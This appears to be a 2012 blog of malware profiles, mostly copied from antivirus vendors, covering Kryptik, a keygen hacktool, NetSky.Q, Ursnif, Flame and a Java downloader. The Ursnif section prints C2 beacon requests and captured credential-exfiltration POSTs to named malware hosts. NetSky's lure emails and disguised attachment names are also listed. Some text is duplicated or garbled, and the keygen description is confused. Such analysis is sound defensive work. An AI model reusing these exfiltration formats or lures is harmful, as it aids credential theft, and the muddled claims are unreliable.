Trojan.KryptikTrojan.Kryptik may go by the following names: • TrojanKryptik • Trojan Kryptik Trojan.Kryptik may display the following symptoms: • Your computer may decrease in speed. • You may experience vast amounts of pop ups. • You may find unclassified processes running in Task Manager. • Your browsing performance may decrease in speed. • Files may re install themselves even after removal. • File may appear and disappear without you having done anything. Trojan.Kryptik is extremely malicious due to the factor that it is able to actually reinstall its files after being deleted. The fundamental problem with this is that it causes the manual removal process to be extremely hard.Trojan.Kryptik is able to actually also hide itself in running processes on your machine as well as create multiple dangerous files on your system.Trojan.Kryptik is able to block any computer security related applications which you may have running on your machine.Trojan.Kryptik is also able to prevent security applications from entering the quarantine process as well as being able to prevent some of its files from updating on the definition database. Trojan.Kryptik will only cause you problems and is better avoided. If you suspect that you may have running on your Trojan.Kryptik machine, then you need to remove it immediately. You have the option of the manual removal process or alternatively the automatic removal process. You need to be aware of the factor that if you decide to choose the manual removal process, the risks are high of you causing even more additional damage to your computer. It is seriously within your best interest to make use of the automatic removal process, which will both detect as well as remove Trojan.Kryptik for you. Remember to use an up to date, reliable and user friendly spyware removal tool. |
|
|
|
|
Computer, Software, Hardware, Peripherals, Desktop, Service & Maintenance
Showing posts with label New Virus. Show all posts
Showing posts with label New Virus. Show all posts
Saturday, October 27, 2012
Trojan.Kryptik
Thursday, October 18, 2012
About The HackTool
About The HackTool:Win32/Keygen
Computer virus is extremely dangerous
for the health of the computer. It can exploit the working of your
computer system. If you detect problems in working on your system then
definitely your system is infected with harmful virus.
HackTool:Win32/Keygen is classified as harmful virus which is one of
creation of remote hackers. As it name implies, it hacks your system and
steal the sensitive data without the users knowledge or consent. It
leaves malicious codes in the system and records all your browsing
activity.
HackTool:Win32/Keygen
is evolved and expanded. It has infected millions of computer globally.
It is also able to download additional virus and tries to take over all
the system. CRCK_KEYGEN, Troj/Keygen, not-a-virus Keygen are its common
aliases. It is a tricky virus which cannot be trusted. Actually it
promotes its antivirus program. It have capability to disable your
updated antivirus. When you scan your system it displays fake scanning
reports and tactics on you to buy its licensed version. If it trace your
system then you would have to suffer with great data loss. So try to
stop it in its early phase. It is strongly recommended don’t avoid its
presence. Remove it quicky by using powerful tool.
Number of Infections of HackTool:Win32/Keygen:
HackTool:Win32/Keygen is very lethal and propagates very vigorously.
According to experts, it could infects as many as 60 files at a time
which is quite high.
Operating System platforms infected by HackTool:Win32/Keygen:
HackTool:Win32/Keygen is equally dangerous for all the Windows System.
Windows Operating System including Windows XP, Vista, Windows 7 etc are
the soft targets of HackTool:Win32/Keygen infection.
Through Email attachments:
Freeware downloads and social plug-ins:
Through social file sharing:
Visiting Porn and Malicious sites:
Below given guidelines can help you to prevent the entrance of HackTool:Win32/Keygen like infections on the Windows system:
Use Advance System Security Software:
To maintain the system running effectively without any interruption, it
is mandatory to use highly advance system security programs which can
prevent the unauthorized access.
Enable Firewall Settings:
By enabling the firewall settings option on Windows system, you will be
able to stop the access of malicious computer threat which are trying
to gain access on the user computer.
Make use of Strong passwords over Network: The use of strong passwords are very much recommended to maintain the security of system.
Avoid Freeware and Shareware Downloads:
It is necessary that you should avoid downloading fareware and
shareware program from web. It is because many of the addware and
malware programs enters to the PC without any user knowledge with the
files related with the program.
Take Caution While Opening Attachments:
It is suggested to avoid opening the attachments coming from untrusted
source. If you are opening such files then you should require to first
scan the entire system using effective anti-virus program.
Tuesday, October 16, 2012
Win32/NetSky.Q
Win32/NetSky.Q
Win32/NetSky.Q is an internet worm spreading via e-mail messages, P2P networks or shared network drives.
Note: In following
text a symbolic inscription %windir% is used instead of the name of
directory in which Windows operating system is installed. Of course,
this may differ from installation to installation. The subdirectory
System or System32 placed in %windir% has a name %system%
The worm is in an executable that is nearly 29 kiobytes long. Upon execution it copies itself into the %windir% directory using the name "FVProtect.exe".
It also creates a file called "userconfig9x.dll", that is 26 kB long. This dynamic library file is then executed.
In order to be run every time the Windows starts, the worm creates Registry entry called "Norton Antivirus AV" in the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
The new entry contains the path to "FVProtect.exe".
The following Registry entries are removed by the worm:
It also creates a file called "userconfig9x.dll", that is 26 kB long. This dynamic library file is then executed.
In order to be run every time the Windows starts, the worm creates Registry entry called "Norton Antivirus AV" in the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
The new entry contains the path to "FVProtect.exe".
The following Registry entries are removed by the worm:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\au.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3dupdate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gouday.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\srate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DELETE ME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jijbl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgsvr32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sentry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\au.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3dupdate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gouday.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\srate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DELETE ME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jijbl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgsvr32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sentry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
This way, some older worms can be deactivated, if present on the system.
The following files are created in the %windir% directory: base64.tmp, zip1.tmp, zip2.tmp, zip3.tmp, zipped.tmp.
These are used when the e-mail messages are composed.
The worm searches all local disks for directories, that contain some of the following strings in their names:
The following files are created in the %windir% directory: base64.tmp, zip1.tmp, zip2.tmp, zip3.tmp, zipped.tmp.
These are used when the e-mail messages are composed.
The worm searches all local disks for directories, that contain some of the following strings in their names:
bear
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
my shared folder
shar
shared files
upload
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
my shared folder
shar
shared files
upload
The messages used for spreading the worm are composed
using a long list of strings. The address of the sender is either
randomly picked from the harvested addresses, or it may be one of the
addresses contained in the worm:
abuse@gov.us
noreply@paypal.com
support@symantec.com
noreply@paypal.com
support@symantec.com
Subject of the message is chosen from the list below:
-do0-i4grjj40j09gjijgp0i09u5rug08r89589gjrg
Administrator
approved
Congratulations!
corrected
Do you?
Body of the e-mail contains one of the following messages, but it can also be blank.
9u049u89gh89fsdpokofkdpbm3-4iAre you a spammer? (I found your email on a spammer website!?!)
Authentication required.
Bad Gateway: The message has been attached.
Best wishes, your friend.
Binary message is available.
Can you confirm it?
Congratulations!, your best friend.
Delivered message is attached.
Do not visit this illegal websites!
Encrypted message is available.
The attachment can either be an executable or a ZIP archive. If it's an EXE file, it has two extensions. The first one is either ".doc" or ".txt",
and the other is ".exe", ".scr" or ".pif".
If the attachment is a ZIP archive, its extension is ".zip". The archive contains the Win32/Netsky.Q executable. The file inside the archive can have three different names:
and the other is ".exe", ".scr" or ".pif".
If the attachment is a ZIP archive, its extension is ".zip". The archive contains the Win32/Netsky.Q executable. The file inside the archive can have three different names:
document.txt .exe
data.rtf .scr
details.txt .pif
data.rtf .scr
details.txt .pif
Trojan.Spy.Ursnif.F
Trojan.Spy.Ursnif.F
| Spreading: | medium | |
| Damage: | high | |
| Size: | approx 50k | |
| Discovered: | 2010 Oct 20 |
TECHNICAL DESCRIPTION:
Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes and injects itself to iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest to intercept browser trafic.
The backdoor behaviour starts when it connects to a server that appers with diffrent host names : rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1
The version id is memorized in a registry key:
Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
Value = Version
Data = Hex:001F1524 , Decimal:2037028
The user_id is random.
If the request succeeds and the connection is established the malware takes control:
- it receives commands:
- download - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
- kill windows - KILL (writes in "\\.\C:" a 0x10000 size buffer( the module of the current process));
- reboot system - REBOOT;
- take screenshots - SCREENSHOT;
- delete cookies - CLEAR_COOK;
- when the user logs on diffrent internet accounts it sends the private information (user_name,passwords) to a remote location:
example wireshark capture:
POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
User-Agent: IE
Host: tryfindithere.com
Content-Length: 337
Cache-Control: no-cache
----------------------------2b01852b01852b0185
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream
URL: http://fa[removed]war.com/index.php
login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
- it downloads an encrypted buffer to a memory location that contains :
- the names of some bank websites : millenniumbcp.pt , santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
- some javascript code to identify and steal passwords, user names, card pins from those bank websites;
- also when the user logs on those bank websites, screenshot pictures are send to a remote location :
example wireshark capture:
POST /cgi-bin/ss.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
User-Agent: IE
Host: thecargotime.com
Content-Length: 146030
Cache-Control: no-cache
----------------------------905c4c905c4c905c4c
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream
It creates events with restricted rights: denied for guest and anonymouse users ( D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
Every action is executed by threads that are syncronized using critical sections or events.
It uses a pipe for communication between threads (read/write).
Trojan.Flame.A
Trojan.Flame.A
| Spreading: | medium | |
| Damage: | very high | |
| Size: | ~20MB | |
| Discovered: | 2012 May 28 |
Presence of the following files:
%windir%\\system32\\commgr32.dll
%windir%\\system32\\comspol32.dll
%windir%\\system32\\comspol32.ocx
%windir%\\system32\\indsvc32.dll
%windir%\\system32\\indsvc32.ocx
%windir%\\system32\\modevga.com
%windir%\\system32\\mssui.drv
%windir%\\system32\\scaud32.exe
%windir%\\system32\\sdclt32.exe
%windir%\\system32\\watchxb.sys
%windir%\\system32\\winconf32.ocx
Presence of this directory:
%COMMONPROGRAMFILES%\\Microsoft Shared\\MSSecurityMgr\\
%windir%\\system32\\commgr32.dll
%windir%\\system32\\comspol32.dll
%windir%\\system32\\comspol32.ocx
%windir%\\system32\\indsvc32.dll
%windir%\\system32\\indsvc32.ocx
%windir%\\system32\\modevga.com
%windir%\\system32\\mssui.drv
%windir%\\system32\\scaud32.exe
%windir%\\system32\\sdclt32.exe
%windir%\\system32\\watchxb.sys
%windir%\\system32\\winconf32.ocx
Presence of this directory:
%COMMONPROGRAMFILES%\\Microsoft Shared\\MSSecurityMgr\\
TECHNICAL DESCRIPTION:
This is a multi-component malware for targeted attacks. It is able to spy, leak data, download/execute other components.Please let Bitdefender disinfect your files.
You can also download our removal tool:
http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/
New Virus Attack ! Java Trojan Downloader
Java.Trojan.Downloader.OpenConnection.AI is a malicious Java
applet that downloads and executes arbitrary files. In the wild, it can
be found as a Java archive. The malicious HTML passes the encrypted URL
of the file to download and execute as the parameter a to the applet. The applet uses the CVE-2010-0840 exploit to bypass the Java sandbox.
The JAR file contains four class files in the bpac package:
- KAVS.class;
- a$1.class;
- a.class - the applet;
- b.class - the URL decrypter.
The applet starts out by generating a random name for the executable under the system temporary directory. The name is made up entirely of random digits and has the extension ".exe" appended.
Next, it checks whether the operating system is Windows, by searching for the string Windows in the os.name system property.
If the OS checks out, the applet downloads the file and executes it with a call to Runtime#exec.
The code is somewhat obfuscated, for example, the names of the system properties java.io.tmpdir and os.name appear reversed.
We have observed two variants of the decrypter:
-
One performs a series of single-character replacements on the URL, then appends
the string "?i=1". -
The other one is a bit more complex, it assumes the URL isn’t
encrypted at all, and duplicates some of the applet’s code. It downloads
the file at the given URL, assumes it’s a PE executable and checks the Characteristics field of the IMAGE_FILE_HEADER for 0x2000, i.e., IMAGE_FILE_DLL.
It generates a random name made up of digits for the executable, under the system temporary directory, it appends the proper extension taking into account whether the file is a DLL or an EXE. If it’s an EXE, it executes it with a call to Runtime#exec, just like the applet does, if it’s a DLL, it registers it using regsvr32.
Subscribe to:
Posts (Atom)



